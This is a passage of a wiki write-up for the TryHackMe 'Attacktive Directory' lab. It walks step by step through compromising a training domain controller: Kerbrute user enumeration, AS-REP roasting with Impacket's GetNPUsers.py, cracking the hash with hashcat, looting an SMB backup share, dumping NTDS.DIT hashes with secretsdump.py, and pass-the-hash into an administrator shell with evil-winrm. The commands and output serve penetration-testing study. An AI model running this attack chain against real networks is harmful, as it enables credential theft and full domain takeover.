S-1-5-21-3591857110-2884097990-301047963-1036 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1037 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1038 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1039 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1040 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1041 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1042 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1043 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1044 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1045 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1046 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1047 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1048 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1049 *unknown*\*unknown* (8)&lt;br /&gt;
S-1-5-21-3591857110-2884097990-301047963-1050 *unknown*\*unknown* (8)&lt;br /&gt;
&lt;br /&gt;
 ==============================================&lt;br /&gt;
|    Getting printer info for 10.10.195.136    |&lt;br /&gt;
 ==============================================&lt;br /&gt;
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
enum4linux complete on Fri Aug  6 12:20:56 2021&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Enumerating Users via Kerberos ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We will enumerate usernames using Kerbrute. We are presented with a User List and a Password List (https://github.com/Sq00ky/attacktive-directory-tools). First we will add an entry in our hosts file so the domain points to the correct IP address.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root# echo 10.10.195.136 spookysec.local &amp;gt;&amp;gt; /etc/hosts&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We will run the userenum command with Kerbrute and output the result to kerbrute.result&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root# ./kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100 &amp;gt; /root/ctf/kerbrute.result&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    __             __               __&lt;br /&gt;
   / /_____  _____/ /_  _______  __/ /____&lt;br /&gt;
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \&lt;br /&gt;
 / ,  Using KDC(s):&lt;br /&gt;
2021/08/06 12:26:56 &amp;gt;  	spookysec.local:88&lt;br /&gt;
&lt;br /&gt;
2021/08/06 12:26:56 &amp;gt;  [+] VALID USERNAME:	 james@spookysec.local&lt;br /&gt;
2021/08/06 12:26:56 &amp;gt;  [+] VALID USERNAME:	 svc-admin@spookysec.local&lt;br /&gt;
2021/08/06 12:26:56 &amp;gt;  [+] VALID USERNAME:	 James@spookysec.local&lt;br /&gt;
2021/08/06 12:26:57 &amp;gt;  [+] VALID USERNAME:	 robin@spookysec.local&lt;br /&gt;
2021/08/06 12:26:58 &amp;gt;  [+] VALID USERNAME:	 darkstar@spookysec.local&lt;br /&gt;
2021/08/06 12:26:58 &amp;gt;  [+] VALID USERNAME:	 administrator@spookysec.local&lt;br /&gt;
2021/08/06 12:26:59 &amp;gt;  [+] VALID USERNAME:	 backup@spookysec.local&lt;br /&gt;
2021/08/06 12:27:00 &amp;gt;  [+] VALID USERNAME:	 paradox@spookysec.local&lt;br /&gt;
2021/08/06 12:27:04 &amp;gt;  [+] VALID USERNAME:	 JAMES@spookysec.local&lt;br /&gt;
2021/08/06 12:27:05 &amp;gt;  [+] VALID USERNAME:	 Robin@spookysec.local&lt;br /&gt;
2021/08/06 12:27:13 &amp;gt;  [+] VALID USERNAME:	 Administrator@spookysec.local&lt;br /&gt;
2021/08/06 12:27:28 &amp;gt;  [+] VALID USERNAME:	 Darkstar@spookysec.local&lt;br /&gt;
2021/08/06 12:27:33 &amp;gt;  [+] VALID USERNAME:	 Paradox@spookysec.local&lt;br /&gt;
2021/08/06 12:27:50 &amp;gt;  [+] VALID USERNAME:	 DARKSTAR@spookysec.local&lt;br /&gt;
2021/08/06 12:27:54 &amp;gt;  [+] VALID USERNAME:	 ori@spookysec.local&lt;br /&gt;
2021/08/06 12:28:04 &amp;gt;  [+] VALID USERNAME:	 ROBIN@spookysec.local&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Abusing Kerberos ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We&amp;#039;ll use Impacket&amp;#039;s &amp;quot;GetNPUsers.py that will allow us to query ASReproastable accounts from the key Distribution Center.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root#./GetNPUsers.py spookysec.local/svc-admin -no-pass &amp;gt; /root/ctf/TGT_for_svc-admin&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation&lt;br /&gt;
&lt;br /&gt;
[*] Getting TGT for svc-admin&lt;br /&gt;
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:47b77...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This is a Kerberos 5 AS-REQ etype 23 hash (Which you can find in the Hashcat example wiki page and the mode is 18200.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Using hashcat and the password list we&amp;#039;ve been provided we can crack the hash.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root# hashcat -a 0 -m 18200 TGT_for_svc-admin /root/ctf/attacktive-directory-tools/passwordlist.txt&lt;br /&gt;
&lt;br /&gt;
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:47b77...:m...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Back to basic ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now that we have the password for svc-admin we will enumaret SMB using smbclient&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root# smbclient -L //10.10.195.136 -U svc-admin&lt;br /&gt;
&lt;br /&gt;
WARNING: The &amp;quot;syslog&amp;quot; option is deprecated&lt;br /&gt;
Enter WORKGROUP\svc-admin&amp;#039;s password:&lt;br /&gt;
&lt;br /&gt;
	Sharename       Type      Comment&lt;br /&gt;
	---------       ----      -------&lt;br /&gt;
	ADMIN$          Disk      Remote Admin&lt;br /&gt;
	backup          Disk&lt;br /&gt;
	C$              Disk      Default share&lt;br /&gt;
	IPC$            IPC       Remote IPC&lt;br /&gt;
	NETLOGON        Disk      Logon server share&lt;br /&gt;
	SYSVOL          Disk      Logon server share&lt;br /&gt;
Reconnecting with SMB1 for workgroup listing.&lt;br /&gt;
Connection to 10.10.195.136 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)&lt;br /&gt;
Failed to connect with SMB1 -- no workgroup available&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Continue enumerating the share called backup, we find a file hidden inside.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@ip-10-10-254-94:~/ctf# smbclient //10.10.195.136/backup -U svc-admin&lt;br /&gt;
&lt;br /&gt;
WARNING: The &amp;quot;syslog&amp;quot; option is deprecated&lt;br /&gt;
Enter WORKGROUP\svc-admin&amp;#039;s password:&lt;br /&gt;
Try &amp;quot;help&amp;quot; to get a list of possible commands.&lt;br /&gt;
smb: \&amp;gt; ls&lt;br /&gt;
  .                                   D        0  Sat Apr  4 20:08:39 2020&lt;br /&gt;
  ..                                  D        0  Sat Apr  4 20:08:39 2020&lt;br /&gt;
  backup_credentials.txt              A       48  Sat Apr  4 20:08:53 2020&lt;br /&gt;
&lt;br /&gt;
		8247551 blocks of size 4096. 3624040 blocks available&lt;br /&gt;
smb: \&amp;gt; get backup_credentials.txt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Decoding the content of the file we get the username and password for backup user.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Elevating Privileges within the Domain ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Using Impacket&amp;#039;s secretdump.py will allow us to retrieve all of the password from the hashes that this user account has.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@ip-10-10-254-94:/opt/impacket/examples# ./secretsdump.py backup@spookysec.local&lt;br /&gt;
&lt;br /&gt;
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation&lt;br /&gt;
&lt;br /&gt;
Password:&lt;br /&gt;
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied&lt;br /&gt;
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)&lt;br /&gt;
[*] Using the DRSUAPI method to get NTDS.DIT secrets&lt;br /&gt;
Administrator:500:.......................&lt;br /&gt;
&lt;br /&gt;
[*] Cleaning up...&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We will use a method called pass the hash that would allow us to authenticate as the user without the password.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We&amp;#039;ll use a tool called EvilWinRM with the option -H to pass the hash.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@ip-10-10-254-94:~/ctf# evil-winrm -i 10.10.195.136 -u Administrator -H 0e036.....&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Evil-WinRM shell v2.4&lt;br /&gt;
&lt;br /&gt;
Info: Establishing connection to remote endpoint&lt;br /&gt;
&lt;br /&gt;
*Evil-WinRM* PS C:\Users\Administrator\Documents&amp;gt; whoami&lt;br /&gt;
thm-ad\administrator&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
And from here on out you can find the flags and submit them.&lt;br /&gt;
&lt;br /&gt;
[[Category:TryHackMe]]&lt;br /&gt;
[[Category:Windows]]&lt;br /&gt;
[[Category:Write-ups]]&lt;/div&gt;</summary>
		<author><name>imported&gt;Aghanim</name></author>
	</entry>
</feed>